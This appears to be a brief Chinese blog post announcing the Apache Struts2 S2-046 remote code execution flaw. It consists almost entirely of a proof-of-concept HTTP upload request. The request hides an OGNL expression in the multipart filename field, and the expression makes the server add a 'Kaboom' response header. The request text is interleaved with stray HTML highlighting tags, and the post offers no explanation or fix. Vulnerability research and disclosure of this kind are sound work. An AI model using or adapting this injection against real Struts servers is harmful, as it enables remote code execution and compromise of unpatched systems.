Mr.Tcsy

Apache Struts2再曝远程代码执行漏洞(S2-046 附PoC)

Word count: 82 / Reading time: 1 min
2017/03/21 Share
1
2

POST /doUpload.action HTTP/<span class="hljs-number">1.1</span> <span class="hljs-symbol">Host:</span> localhost:<span class="hljs-number">8080</span> Content-Length: <span class="hljs-number">10000000</span> Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z <span class="hljs-symbol">Connection:</span> close ------WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name=<span class="hljs-string">"upload"</span>; filename=<span class="hljs-string">"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"</span> Content-Type: text/plain Kaboom ------WebKitFormBoundaryAnmUgTEhFhOZpr9z
CATALOG